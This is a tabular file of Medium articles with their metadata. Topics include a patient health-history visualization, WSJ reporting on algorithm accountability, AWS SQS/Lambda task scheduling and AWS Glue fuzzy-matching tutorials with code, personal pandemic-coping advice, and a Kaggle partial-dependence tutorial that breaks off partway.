Columns: title, text, url, authors, timestamp, tags
It’s Complicated
It’s Complicated Visualizing complex health histories & symptoms for two patients with rare and mystery conditions I recently worked with a smart, well-spoken patient, E., to put together a visual summary of her health. Unlike many others I’ve worked with, she was not looking for answers or a new diagnosis; she was motivated because she was starting the application process for a new service dog, and she needed to demonstrate her physical constraints and daily needs. She also had a complex medical history, with multiple chronic conditions, injuries, surgeries and procedures, and she wanted to see everything in one place for the first time. I went through my standard process of gathering her information, talking through her story with her, and creating visuals to represent the conversation. I then created a detailed timeline and symptom map, with an emphasis on her two longstanding conditions, Cryoglobulinemia and Ehlers-Danlos Syndrome (EDS). Both of these conditions are considered ‘rare diseases’ — meaning each one affects fewer than 200,000 Americans at any given time. A quick aside with some definitions: Cryoglobulinemia is the presence of abnormal proteins in the blood, and symptoms often include skin lesions and purple spots, joint pain, peripheral neuropathy (in other words burning or tingling in hands and feet), and more. EDS is a connective tissue disorder “generally characterized by joint hypermobility (joints that stretch further than normal), skin hyperextensibility (skin that can be stretched further than normal), and tissue fragility” (source: Ehlers-Danlos Society website). In addition to these two key diagnoses, E. also had Dysautonomia, an issue with her autonomic nervous system that causes fast heart rate, lightheadedness on standing, inability to regulate sweating, and more. All together, these three conditions caused E. a whole host of symptoms and injuries, many stretching back to her childhood. She’d had six broken ankles between age 10 and 15; at one point both of her ankles were broken at the same time. She estimated she’d had close to 50 surgeries since 1985. It was a lot to look back on, and it made for a very full timeline, as you can see below (most words and dates removed for privacy).
https://medium.com/pictal-health/its-complicated-60b2cb9c2398
['Katie Mccurdy']
2019-03-13 12:40:04.849000+00:00
['Design', 'Healthcare', 'Patient Experience', 'Health', 'Data Visualization']
What is the Role of Journalists in Holding Artificial Intelligence Accountable?
What is the Role of Journalists in Holding Artificial Intelligence Accountable? The Wall Street Journal is experimenting with a new approach for reporting how smart algorithms work, beyond simply describing them. Image Credit: Gabriel Gianordoli/ WSJ Journalists, who routinely ask questions of their sources, should also be asking questions about an algorithm’s methodology. The rules created for algorithms need to be explicit and understood. The Wall Street Journal has been experimenting with a new approach to explain how AI works by letting readers experiment with it. “Interactive graphics can provide insights into how algorithms work in a way beyond simply describing its output. They can do this by acting as safe spaces in which readers can experiment with different inputs and immediately see how the computer might respond to it,” said deputy graphics director Elliot Bentley. “To make this accessible and non-intimidating, it’s important to design a straightforward interface with minimal controls, and also provide informative and immediate feedback,” Bentley added. Image Credit: Gabriel Gianordoli/ WSJ The most recent example of letting readers experiment with algorithms is our story, “What Your Writing Says About You,”published as part of the Leadership issue of Journal Reports. The news experience offers an interface allowing people to enter text such as an essay, cover letter, blog post or business email and receive results from algorithms that rate the content by different parameters. By including detailed methodology and source notes, we allow our audiences to understand how machine learning and natural language processing can determine context, language mastery, meaning and even your mood from the choice of words. “These explorable explainers allow us to not only go deeper, but also to give the readers a perspective on subjects like AI that we can’t give them by simply writing more great stories. It immerses them in a unique way in a subject we know they care about,” said Journal Reports editor Larry Rout. In a previous Graphics project entitled “How Facial Recognition Software Works,” Bentley explained that readers need only to enable their webcam and begin moving their head around in order to play with a facial-recognition algorithm. It then provides clear, real-time feedback using a series of visual overlays. Another example of this is “Build Your Own Trading Bot” in which we attempted to demystify algorithmic trading by designing a user-friendly interface and a rewarding feedback loop to encourage readers to experiment with the mechanics. How Facial Recognition Software Works. Credit: Elliot Bentley/WSJ Journalism and algorithmic accountability We might not notice it, but artificial intelligence affects multiple parts of our lives. These algorithms decide whether an individual qualifies for a loan, whether a resume is seen by a recruiter, which seat a passenger is assigned on an airplane, which advertisements shoppers see online and what information on the internet is shown to users. Transparency of the data that feeds these processes is crucial both for consumers to better understand what they encounter and for organizations to shape their business strategy. Given the challenging nature of auditing algorithms, it’s important to consider how the practice of journalism can be leveraged to hold AI systems accountable. 
In his forthcoming book, Northwestern University professor of computational journalism Nicholas Diakopoulos introduces the notion of algorithmic accountability reporting as an approach to highlight influences that computer programs exercise in society. “Operating at scale and often affecting large groups of people, algorithms make consequential and sometimes contestable decisions in an increasing range of domains throughout the public and private sectors. In response, a distinct beat in journalism is emerging to investigate the societal power exerted through such algorithms. There are various newsworthy angles on algorithms including discrimination and unfairness, errors and mistakes, social and legal norm violations, and human misuse. Reverse engineering and auditing techniques can be used to elucidate the contours of algorithmic power,” Diakopoulos explained. The “black box” problem in AI When certain decisions are derived through an algorithm, it’s often hard to pinpoint why or how an automatic output was derived. This introduces the problem of the “black box” algorithm whereby correlations are made without rules set by humans. This term is often used as a metaphor for algorithms in which the process to reach a certain outcome cannot be seen in full. “Auditing algorithms is not for the faint of heart. Information deficits, expectation setting, limited legal access, and shifting dynamic targets can all hamper an investigation. Working in teams, methods specialists working with domain experts can, however, overcome these obstacles and publish important stories about algorithms in society,” Diakopoulos added. It’s indeed relevant to dissect how computers make decisions and to comprehend how smart systems are created. For example, the AI powering the set of analysis in “What Your Writing Says About You” is provided by Factbase, an AI company which makes its algorithms open source, peer reviewed, and available for examination. In “What Your Writing Says about You,” we explain the underlying scientific methodology behind each output, including the Flesch-Kincaid Grade Level — developed in 1975 by the Department of Defense to review readability level of military materials — as well as the Treebank methodology created by the University of Pennsylvania to evaluate linguistic structure of text. “It’s important, as much as is possible, to understand the parameters under which the AI or algorithms arrived at its conclusions. What parameters it examines, and how it analyzes it, provides transparency to its thinking, per se, which in turn makes it more clear how it decides what it decides,” said Bill Frischling, founder of FactBase. This issue is prevalent in artificial intelligence, partly because the systems are not necessarily designed to explain how they do certain things, but to just do them. This is also a byproduct of algorithms learning by themselves; they make causal links not based on human instruction but on self-identified patterns. Newsroom collaboration The Wall Street Journal’s news hub in New York City. There are, of course, technical gaps to developing this type of reporting on algorithms, which can be addressed by working cross-functionally with data scientists, computational journalists and technologists. Increasingly, it’s important to foster a culture of collaboration throughout the newsroom and bring multiple perspectives into the process of story planning and development. “A project such as this which taps so many areas of expertise and aligns them is a pleasure to be part of. 
What started with WSJ Lab’s original outline of possibilities was honed by a team of editors at Journal Reports to focus on specifically what our writing reveals about us. Our interactives team wrangled the code, user interface and graphic visualization,” said news editor Demetria Gallegos. “Then, privacy experts from our legal and data teams, our social and off-platform colleagues and homepage and mobile editors weighed in to ensure the experience is optimized for every reader,” Gallegos added. The odds for a successful collaboration can be increased if the organization is able to foster an environment where journalists are encouraged to test new ideas, to seek feedback, and to share best practices even if experiments are unsuccessful. Building this “feedback loop” can enable news professionals to mitigate the uncertainty of experimentation as well as inform the broader newsroom strategy. “When we are thinking about how to create an innovative news experience, we have to consider how readers already ingest news — and how much further they are willing to go. In our discussions during the story planning process, we ran through various scenarios of how the tool could work, based on different criteria. We then ruled out things that would require too much time or too many steps. We also had to be sensitive to how much information people are willing to disclose. We designed this interactive story to be fun enough to get readers in, engaging enough to have them read through it, take the quiz, play the game etc. And if they end up sharing their results on social media, we know we did it right,” explained news editor Cristina Lourosa. Journalistic standards and technological evolution Just because a certain result came from a computer, it doesn’t mean it’s right. Artificial intelligence is programmed by humans and consequently it can make mistakes. The ethical considerations inherent to using AI are far and wide. “Understanding the source of information whether it’s from a person or algorithm is not only crucial for the news industry but as well, for democracy,” said Kourosh Houshmand, a computational journalist at Columbia Journalism School. The practice of journalism is about questioning the world around us, and that same principle still applies even when a piece of software played a role in a particular outcome such as determining the price of a product, evaluating how a person feels based on their writing or selecting a candidate for a job interview. “We can help readers understand how technology works by explaining how the algorithms get their results and then pointing to the source documents and formulas that power the calculations,” said graphics reporter Nigel Chiwaya. An effective way to understand AI is to experiment with it, comprehend the nuances of how algorithms make decisions and how those decisions may affect our lives.
https://medium.com/the-wall-street-journal/what-is-the-role-of-journalists-in-holding-artificial-intelligence-accountable-9a6321e5a265
['Francesco Marconi']
2020-04-20 08:43:10.910000+00:00
['Algorithms', 'Artificial Intelligence', 'Journalism', 'Best Practices', 'Ethics']
Scheduling tasks with AWS SQS and Lambda
Scheduling tasks with AWS SQS and Lambda In this story, we will learn a workaround for scheduling or delaying a message with AWS SQS despite its 15-minute (900-second) upper limit. First, let us briefly understand some SQS attributes. The first is Delivery Delay: it lets you specify a delay between 0 and 900 seconds (15 minutes). When set, any message sent to the queue only becomes visible to consumers after the configured delay period. The second is Visibility Timeout: the period during which a received message remains in the queue but cannot be received again unless it is deleted. If you want to learn about dead-letter queues and deduplication, you could follow my other article: Processing High Volume Big Data Concurrently with No Duplicates using AWS SQS. So, when a consumer receives a message, the message remains in the queue but is invisible for the duration of its visibility timeout, after which other consumers are able to see it. Ideally, the first consumer handles and deletes the message before the visibility timeout expires. The upper limit for the visibility timeout is 12 hours. We can leverage this to schedule or delay a task. A typical combination is SQS with Lambda, where the invoked function executes the task. Standard queues with Lambda triggers have immediate consumption: when a message is inserted into the queue, the Lambda function is invoked immediately with the message available in the event object. Note: if the Lambda results in an error, the message stays in the queue for further receive requests; otherwise it is deleted. With that in mind, there are two cases: a generic setup that can adapt to a range of time delays, and a stand-alone setup built to handle only a fixed time delay. The idea is to insert a message into the queue with the task details and the time to execute it (target time) and have the Lambda do the dirty work. Case 1: The Lambda function checks whether the target time equals the current time. If so, it executes the task and the message is deleted because the Lambda completes without error; otherwise it changes the visibility timeout of that message to the remaining delta and raises an error, leaving the message in the queue. Case 2: The queue's default visibility timeout is configured with the required fixed time delay. The Lambda function checks whether the difference between the target time and the current time equals the fixed time delay. If so, it executes the task and the message is deleted because the Lambda completes without error; otherwise it simply raises an error, leaving the message untouched in the queue. The message is retried after its visibility timeout, which is the required fixed time delay, and is then executed. The problem with this approach is accuracy and scalability.
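To make this concrete, here is a minimal sketch of the producer side, assuming a hypothetical queue URL and message shape; the consumer-side Lambda for case 2 follows below.

import json
import boto3

sqs = boto3.client('sqs')

# Hypothetical queue URL; replace with your own standard queue.
QUEUE_URL = 'https://sqs.us-east-1.amazonaws.com/123456789012/task-scheduler-queue'

def schedule_task(task_details, execute_at, delay_seconds=0):
    # DelaySeconds is capped at 900 (15 minutes) by SQS Delivery Delay;
    # anything longer is handled by the consumer via the visibility timeout.
    body = json.dumps({
        'task_details': task_details,
        'execute_at': execute_at,  # e.g. "25/12/2020, 10:30 AM CST"
    })
    return sqs.send_message(
        QueueUrl=QUEUE_URL,
        MessageBody=body,
        DelaySeconds=min(delay_seconds, 900),
    )

# Example: schedule a hypothetical report-generation task.
# schedule_task({'job': 'generate_report', 'report_id': 42}, '25/12/2020, 10:30 AM CST')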
Here's the Lambda code for case 2:

Processor.py

import json
from datetime import datetime
import dateutil.tz

tz = dateutil.tz.gettz('US/Central')
FIXED_TIME_DELAY_HOURS = 1  # the fixed delay this queue is configured for; change as needed
TIME_FORMAT = "%d/%m/%Y, %I:%M %p CST"

def lambda_handler(event, context):
    # The SQS trigger delivers the message inside event['Records']
    message = event['Records'][0]
    result = json.loads(message['body'])
    task_details = result['task_details']
    target_time = result['execute_at']

    # Parse the target time and the current US/Central time with the same format
    tt = datetime.strptime(target_time, TIME_FORMAT)
    tn = datetime.strptime(datetime.now(tz).strftime(TIME_FORMAT), TIME_FORMAT)

    delta_hours = (tn - tt).total_seconds() / 3600
    if round(delta_hours) == FIXED_TIME_DELAY_HOURS:
        # The message has waited out the fixed delay: execute the task logic
        print(task_details)
    else:
        # Raising keeps the message in the queue; it becomes visible again after
        # the visibility timeout (the fixed delay) and is then retried
        raise RuntimeError("Fixed time delay not reached; leaving the message in the queue")

Conclusion: Scheduling tasks using SQS isn't effective in all scenarios. You could use the AWS Step Functions wait state to achieve millisecond accuracy, or DynamoDB's TTL feature to build an ad hoc scheduling mechanism; the choice of service depends largely on the requirement. So, here's a wonderful blog post that gives you a bigger picture of the different ways to schedule a task on AWS. This story is authored by Koushik. Koushik is a software engineer specializing in AWS Cloud Services.
https://medium.com/zenofai/scheduling-tasks-with-aws-sqs-and-lambda-82bdcfbc0fd8
['Engineering Zenofai']
2020-02-20 14:14:17.090000+00:00
['Software Development', 'AWS Lambda', 'AWS', 'Cloud Computing']
Machine Learning based Fuzzy Matching using AWS Glue ML Transforms
Machine Learning Transforms in AWS Glue AWS Glue provides machine learning capabilities to create custom transforms that do machine-learning-based fuzzy matching to deduplicate and cleanse your data. For this we are going to use a transform named FindMatches. The FindMatches transform enables you to identify duplicate or matching records in your dataset, even when the records do not have a common unique identifier and no fields match exactly. This does not require writing any code or knowing how machine learning works. For more details about ML Transforms, please go through the docs. Creating a Machine Learning Transform with AWS Glue This article walks you through the actions to create and manage a machine learning (ML) transform using AWS Glue. I assume that you are familiar with using the AWS Glue console to add crawlers and jobs and edit scripts. You should also be familiar with finding and downloading files on the Amazon Simple Storage Service (Amazon S3) console. In case you are just starting out on AWS Glue, I have explained how to create an AWS Glue Crawler and Glue Job from scratch in one of my earlier articles. The source data used in this blog is a hypothetical file named customers_data.csv. A second file, label_file.csv, is an example of a labeling file that contains both matching and non-matching records used to teach the transform. Step 1: Crawl the Data using AWS Glue Crawler At the outset, crawl the source data from the CSV file in S3 to create a metadata table in the AWS Glue Data Catalog. I created a crawler pointing to the source location (s3://bucketname/data/ml-transform/customers/). In case you are just starting out on the AWS Glue crawler, I have explained how to create one from scratch in one of my earlier articles. If you run this crawler, it creates a customers table in the specified database (ml-transform). Step 2: Add a Machine Learning Transform Next, add a machine learning transform based on the schema of the data source table created by the crawler above. Choose the Worker type and Maximum capacity as per your requirements. For Data source, choose the table that was created in the earlier step: in this case, the table named customers in the database ml-transform. For Primary key, choose the primary key column for the table, email. Step 3: How to Teach Your Machine Learning Transform Next, teach the machine learning transform using the sample labeling file. You can't use a machine learning transform in an extract, transform, and load (ETL) job until its status is Ready for use. To get your transform ready, you must teach it how to identify matching and non-matching records by providing examples of both. For this article, the label file I have used is label_file.csv. On the AWS Glue console, in the navigation pane, choose ML Transforms. Choose the earlier created transform, and then choose Action, Teach. If you don't have a label file, choose I do not have labels; you can then Generate a label file, add labels, and Upload the label file. If you have a label file, choose I have labels, then choose Upload labeling file from S3. Choose an Amazon S3 path to the sample labeling file in the current AWS Region (s3://bucketname/data/ml-transform/labels/label_file.csv), with the option to overwrite existing labels. The labeling file must be located in S3 in the same Region as the AWS Glue console.
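As an aside, the same create-and-teach steps can also be scripted rather than clicked through. Below is a rough boto3 sketch, not part of the original walkthrough: the transform name, role ARN and capacity settings are placeholder assumptions, while the database, table, primary key and label path follow the values used above.

import boto3

glue = boto3.client('glue')

# Placeholder role ARN; the label path mirrors the one used in the walkthrough.
ROLE_ARN = 'arn:aws:iam::123456789012:role/GlueMLTransformRole'
LABELS_S3_PATH = 's3://bucketname/data/ml-transform/labels/label_file.csv'

# Step 2 equivalent: create a FindMatches transform over the crawled customers table,
# with 'email' as the primary key column.
response = glue.create_ml_transform(
    Name='customers-find-matches',
    Role=ROLE_ARN,
    InputRecordTables=[{'DatabaseName': 'ml-transform', 'TableName': 'customers'}],
    Parameters={
        'TransformType': 'FIND_MATCHES',
        'FindMatchesParameters': {'PrimaryKeyColumnName': 'email'},
    },
    WorkerType='G.1X',
    NumberOfWorkers=10,
)
transform_id = response['TransformId']

# Step 3 equivalent: teach the transform by importing the prepared labeling file.
glue.start_import_labels_task_run(
    TransformId=transform_id,
    InputS3Path=LABELS_S3_PATH,
    ReplaceAllLabels=True,
)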
When you upload a labeling file, a task is started in AWS Glue to add or overwrite the labels used to teach the transform how to process the data source. Step 4: Estimate the Quality of ML Transform What is Labeling? The act of labeling is creating a labeling file (such as in a spreadsheet) and adding identifiers, or labels, into the label column that identify matching and non-matching records. It is important to have a clear and consistent definition of a match in your source data. AWS Glue learns from which records you designate as matches (or not) and uses your decisions to learn how to find duplicate records. Next, you can estimate the quality of your machine learning transform. The quality depends on how much labeling you have done. On the AWS Glue console, in the navigation pane, choose ML Transforms. Choose the earlier created transform, and choose the Estimate quality tab. This tab displays the current quality estimates, if available, for the transform. Choose Estimate quality to start a task that estimates the quality of the transform; the accuracy of the estimate is based on the labeling of the source data. Navigate to the History tab. In this pane, task runs are listed for the transform, including the Estimating quality task. For more details about the run, choose Logs. Check that the run status is Succeeded when it finishes. Step 5: Create and run a Job with ML Transform In this step, we use the machine learning transform to add and run a job in AWS Glue. When the transform is Ready for use, we can use it in an ETL job. On the AWS Glue console, in the navigation pane, choose Jobs, then choose Add job. In case you are just starting out on AWS Glue ETL jobs, I have explained how to create one from scratch in one of my earlier articles. For Name, choose the example job in this tutorial, ml-transform. Choose an IAM role that has permission to access Amazon S3 and AWS Glue API operations. For ETL language, choose Spark 2.2, Python 2 (machine learning transforms are currently not supported for Spark 2.4). For Data source, choose the table created in Step 1; the data source you choose must match the machine learning transform data source schema. For Transform type, choose Find matching records to create a job using a machine learning transform. For Transform, choose the transform created in Step 2, the machine learning transform used by the job. For Create tables in your data target, choose to create tables with the following properties: Data store type: Amazon S3; Format: CSV; Compression type: None; Target path: the Amazon S3 path where the output of the job is written (in the current console AWS Region). Choose Save job and edit script to display the script editor page. The script looks like the following. After you edit the script, choose Save.
import sys
from awsglue.transforms import *
from awsglue.utils import getResolvedOptions
from pyspark.context import SparkContext
from awsglue.context import GlueContext
from awsglue.job import Job
from awsglueml.transforms import FindMatches

## @params: [JOB_NAME]
args = getResolvedOptions(sys.argv, ['JOB_NAME'])

sc = SparkContext()
glueContext = GlueContext(sc)
spark = glueContext.spark_session
job = Job(glueContext)
job.init(args['JOB_NAME'], args)

## @type: DataSource -- read the crawled customers table from the Data Catalog
datasource0 = glueContext.create_dynamic_frame.from_catalog(database = "ml_transforms", table_name = "customers", transformation_ctx = "datasource0")

## @type: ResolveChoice -- resolve ambiguous column types against the catalog table
resolvechoice1 = ResolveChoice.apply(frame = datasource0, choice = "MATCH_CATALOG", database = "ml_transforms", table_name = "customers", transformation_ctx = "resolvechoice1")

## @type: FindMatches -- apply the ML transform created earlier, referenced by its TransformId
findmatches2 = FindMatches.apply(frame = resolvechoice1, transformId = "eacb9a1ffbc686f61387f63", transformation_ctx = "findmatches2")

## @type: DataSink -- write the matched output as CSV to S3
datasink3 = glueContext.write_dynamic_frame.from_options(frame = findmatches2, connection_type = "s3", connection_options = {"path": "s3://<bucket-name>/data/ml-transforms/output/"}, format = "csv", transformation_ctx = "datasink3")

job.commit()

Choose Run job to start the job run, and check the status of the job in the jobs list. When the job finishes, a new Run ID row of type ETL job appears on the ML transform's History tab. Navigate to the Jobs, History tab. In this pane, job runs are listed. For more details about the run, choose Logs. Check that the run status is Succeeded when it finishes. Step 6: Verify Output Data from Amazon S3 in Amazon Athena In this step, check the output of the job run in the Amazon S3 bucket that you chose when you added the job.
You can create a table in the Glue Data catalog pointing to the output location, just like the way we crawled the source data in Step 1. You can then query the data in Athena. However, the Find matches transform adds another column named match_id to identify matching records in the output. Rows with the same match_id are considered matching records. If you don’t find any matches, you can continue to teach the transform by adding more labels. Thanks for the read and look forward to your comments This story is authored by PV Subbareddy. Subbareddy is a Big Data Engineer specializing on AWS Big Data Services and Apache Spark Ecosystem.
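As a footnote to Step 6, a query along these lines lists the groups of matching records by match_id. The database, table and result-location names below are placeholders for whatever your output crawler created, and the SQL could equally be pasted straight into the Athena console.

import boto3

athena = boto3.client('athena')

# Placeholder database, table and result-location names.
QUERY = """
SELECT match_id, COUNT(*) AS records_in_group
FROM customers_matches
GROUP BY match_id
HAVING COUNT(*) > 1
ORDER BY records_in_group DESC
"""

athena.start_query_execution(
    QueryString=QUERY,
    QueryExecutionContext={'Database': 'ml_transforms_output'},
    ResultConfiguration={'OutputLocation': 's3://bucketname/athena-results/'},
)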
https://medium.com/zenofai/machine-learning-based-fuzzy-matching-using-aws-glue-ml-transforms-761ad208bdbe
['Engineering Zenofai']
2019-11-21 09:46:35.064000+00:00
['Cloud Computing', 'Machine Learning', 'Spark', 'AWS', 'Software Development']
Do These Things To Survive The Rest of The Pandemic
Do These Things To Survive The Rest of The Pandemic Upgrade your mask. Eat healthy. Sleep. Laugh. You could say round one of the pandemic is over. We didn’t do very well. Plus, round two has already started. The good news is that science has a plan for us. I’m not a scientist, but I listen to science. I got an A in AP biology and a B+ in chemistry, which already makes me more qualified than most of our politicians. Smart people have been taking this thing very seriously. We always do our homework. So here’s a list of practical things you can do to actually make it through this winter: Upgrade your mask. The health experts say the point of wearing a mask is to protect other people. Unfortunately, there’s a lot of idiots out there who think it’s a terrible assault on their personal freedom. So you’re going to have to level up your facegear. Everyone in the world is selling masks right now. Kylie Jenner probably has one. Hold on. Let me check. Yep. She’s got one. Take a look: Kylie Jenner’s face mask. (Not recommended.) Wow. That looks safe… Try this instead: Get a nanofiber mask. You need a mask that filters down to .3 microns. These are called N95 filters. Earlier this year they were hard to come by, and you’d probably go to hell for buying them, because that would’ve meant depriving hospitals of PPE. Good news, a lot’s changed since then. A few months ago, startup companies like Filti started making high quality masks and replaceable filters with nanofiber materials. They’re not medical grade, but they’re lab tested. There’s also HALO Mask, which makes the same kinds of products, using nanofiber manufactured in New Zealand. I did my homework. They’re both legit. (And they’re not paying me anything to plug them. They barely know I exist.) This means you can go run errands without freaking out whenever some covidiot crosses your path without a mask. Same goes if you can’t work from home. Your mask actually protects you. How much? A helluva lot more than your standard generic face mask at most stores. I’ll take it. You’re skeptical. That’s cool. Researching masks turned into a summer project. I spent weeks digging through articles and websites. Finally, a reliable newspaper published this piece explaining how mask filtration works. Basically: Yes, the coronavirus is smaller than .3 microns. (.1 micron, to be exact.) But that doesn’t mean anything by itself, for two reasons: Viruses always attach to larger particles. Nobody inhales free-floating virus. They inhale droplets, which are always 1.0 micron or bigger. You’re filtering the droplets with virus attached to them, not the naked virus particles themselves. Masks with .3 micron filtration can capture particles smaller than that because of a phenomenon called “Brownian motion.” That means very small particles move in a jagged zig-zag pattern, which increases the chances they’ll get snagged. So you’ve got a plan for a decent mask. Now what? Start taking Vitamin D You should be taking a multivitamin. On top of that, the experts are starting to learn that if you’re topped off on Vitamin D, you probably have a lesser risk of dying from the coronavirus. Hey, you might as well try. You can take a supplement. You can drink milk and orange juice. You can eat salmon. You can make sure you spend half an hour outside. Yes, every day. No, you can’t just sit by your window and read. I’m lazy. I checked. Glass blocks the specific spectrum of light your body needs. Start eating your veggies. Your immune system likes healthy food. Dark greens: Kale. 
Spinach. Broccoli. Asparagus. Plus onions and tomatoes. Even my 2-year-old eats kale now. I mix up a bunch of vegetables and kale in a giant batch and pour balsamic and lemon juice all over it. Add some pepper and feta cheese, and some olive oil. I can eat that all day. Start making elderberry syrup. Some studies show it helps reduce the duration and severity of the flu and other viruses. Buying elderberry syrup in a bottle is expensive. So you can make your own. Just buy some elderberries in bulk. You can find all kinds of recipes for syrup online. Stop drinking so much. You’re going to need your liver. Alcohol is bad for it, and basically everything else in your body. New studies have killed that cozy idea that drinking in moderation might improve your health. Basically, the downsides of boozing far outweigh the benefits. Alcohol might lower the risk of heart disease, but it increases the risk of cancer and liver disease. I know. This sucks. We’ve all been using health as an excuse to justify drinking a helluva lot more than usual this year. You’re gonna have to reel it in. You get to drink once a week now, if that. And you get to have one or two drinks maximum. It’s almost, like, not even worth it. Did you know the number one reason people drink is boredom? So I guess you’ll need to find a hobby. Let’s move on to your mental and emotional health. Learn to be okay with a mess. For the first six months, I was all about chores. They relaxed me. Seeing a perfectly clean sink brought me peace. Folding laundry calmed me down. Then something changed. Work got busy again. My toddler developed advanced mess-making skills. Keeping the house clean morphed into a set of expectations I was placing on myself. I sacrificed sleep to keep everything tidy. This had to stop. Upon reflection, I figured out what I was doing. I was stress cleaning. Chores were a way for me to feel like I had control. Learn how to do nothing. The answer to stress cleaning was learning to let go of control, as in literally just stop my brain and do nothing for ten or fifteen minutes. It was easier than I thought. I was ready for a break. I just had to give myself one. Now I’m cured. A handful of dirty dishes in the sink doesn’t stress me out anymore. I can’t afford to let it. Doing nothing is the most relaxing thing in the world right now. It beats just about everything else. Stop trying to relax. Relaxing is overrated now. In the pandemic era, it doesn’t work. I finally realized that everything I was trying to do to “chill out” was just overstimulating or triggering me. After a while, my favorite shows just made me think too much about the future, or too much about the past. So just do nothing. Or… Stop your revenge bedtime procrastination. We already weren’t getting enough sleep before the pandemic. Part of the problem is that we convince ourselves to stay up too late. We do that because we’re trying to steal back a part of our day. The Japanese call this, “Revenge bedtime procrastination.” They have the best names for everything. Sleep is more important than ever. So when you’re tired, do what Samuel L. Jackson says. Just go the f*ck to sleep, man. It’s almost winter. You’re a mammal. Your body wants to hibernate. Let it. That doesn’t mean sleeping the next six months in a cave. But it does mean going to bed when you feel tired, regardless of what time it is. I’ve been going down around 10 pm some nights, about two or three hours early for my taste. But it’s giving me a lot more energy. I wake up at 5 or 6 am, ready to go. 
Finally become a morning person. If you’re stuck in quarantine with family, then super early mornings are basically the only way you can work in peace now. Back in June, I could work under distraction and disruption. Sometimes I still can. But making that the norm was wearing me out. So if I actually want to be productive, I’ll wake up at 4 am and work for a few hours before the kid arises. It helps. It makes the rest of the day more relaxing. Stop trying to not talk about the news. You know what happens when you try to not talk about the news? You think about it. Then you talk about it anyway. Then you feel guilty. What a vicious cycle. If you want to gleefully speculate about when Trump’s going to have a relapse, then just do it. Get it out of your system. Remember to laugh. Take the world seriously. But not that seriously. We were all freaking out about the first presidential debate. The top Google search the next day was “move to New Zealand.” Then Jim Carey and Alec Baldwin saved us. They reminded us how comically absurd that entire debate was. Don’t forget to laugh. It provides perspective. It also boosts your immune system. So watch comedy. Tell jokes. Be sarcastic. Find happiness where you can. It surprises me how often I’m actually happy when I follow all this advice. It almost feels like the world isn’t falling apart. I feel prepared for worst case scenarios. I’m not scared of the bottom anymore. I know what we’ll be doing for the next six months, and I know what’s going to happen. Now it’s just a matter of getting through it. So upgrade your mask. Take your vitamins. Eat your veggies. Cool it with the alcohol. Go to sleep when you’re tired. Stop stress cleaning your house. Remind yourself how to just do nothing. Stop trying so hard to not be in a pandemic. Just be in it. Don’t forget to laugh.
https://medium.com/the-haven/do-these-things-to-survive-the-rest-of-the-pandemic-f66e0245a9f5
['Jessica Wildfire']
2020-10-09 04:59:22.849000+00:00
['Mindfulness', 'Humor', 'Health', 'Culture', 'Society']
Tackling Kaggle’s Mercedes-Benz Greener Manufacturing Competition with Python
Photo by Markus Spiske on Unsplash Introduction In this part, we’ll perform exploratory data analysis (EDA) on our data, which is a crucial part of most machine learning problems. Although we might not end up increasing our score, we will draw invaluable insights from our data, which is often one of the primary objectives of real-world machine learning. We are going to use some of the traditional EDA techniques, but we’ll also touch on a few underused ones as well. You can find the notebook for this tutorial here. Without further ado, let’s get coding (in Colab)! Ceteris Paribus From the previous article, we have a vague idea of what partial dependence is, the problem it tries to solve, and how it does so. However, quite a few of the details were left out, so this article will be devoted to filling those empty spots. First, let’s talk about what ‘with all other things being equal’ means. Suppose we have a smaller version of our dataset, which could look something like this: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | a | 99 | | 0 | 1 | 0 | b | 97 | | 1 | 1 | 1 | c | 102 | | 1 | 0 | 0 | a | 97.5 | | 0 | 0 | 0 | b | 96.5 | | 1 | 0 | 1 | c | 102.9 | +------+------+------+----+-------+ And we’d like to know how the dependent variable reacts to different values of ‘X5’. In order to do so, we must modify our dataset so that all variables but ‘X5’ remain the same. How would we do that? Well, it’s as simple as replacing all instances of ‘X5’ with the class we’d like to know the average test time of. So we’d have 3 (number of classes in ‘X5’) different versions of our dataset and in each one, ‘X5’ is a constant: Dataset A: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | a | 99 | | 0 | 1 | 0 | a | 97 | | 1 | 1 | 1 | a | 102 | | 1 | 0 | 0 | a | 97.5 | | 0 | 0 | 0 | a | 96.5 | | 1 | 0 | 1 | a | 102.9 | +------+------+------+----+-------+ Dataset B: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | b | 99 | | 0 | 1 | 0 | b | 97 | | 1 | 1 | 1 | b | 102 | | 1 | 0 | 0 | b | 97.5 | | 0 | 0 | 0 | b | 96.5 | | 1 | 0 | 1 | b | 102.9 | +------+------+------+----+-------+ Dataset C: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | c | 99 | | 0 | 1 | 0 | c | 97 | | 1 | 1 | 1 | c | 102 | | 1 | 0 | 0 | c | 97.5 | | 0 | 0 | 0 | c | 96.5 | | 1 | 0 | 1 | c | 102.9 | +------+------+------+----+-------+ There are now 3 variations of our dataset, where the only difference between them is ‘X5’ (that is, all other things are equal). All that’s left is simply taking the average of the dependent values of each of the datasets above. But there’s obviously a huge problem we face: The dependent values are for the original dataset, not the modified ones. For example, in the first row, ‘y’ = 99 is the test time for ‘X5’ = ‘a’, not ‘b’ or ‘c’. Thus, we need a way to find the dependent value for a row not present in our dataset. Fortunately, we have the tools to do exactly that. A “Partial” Solution In part 2 of this series, we built a slightly tuned Random Forest and guess what it can do? Estimate the test time of a vehicle, which is just what we need. We can simply use our model to predict the dependent values of datasets A, B, and C (the y-values shown here are most likely not consistent and make no sense at all. 
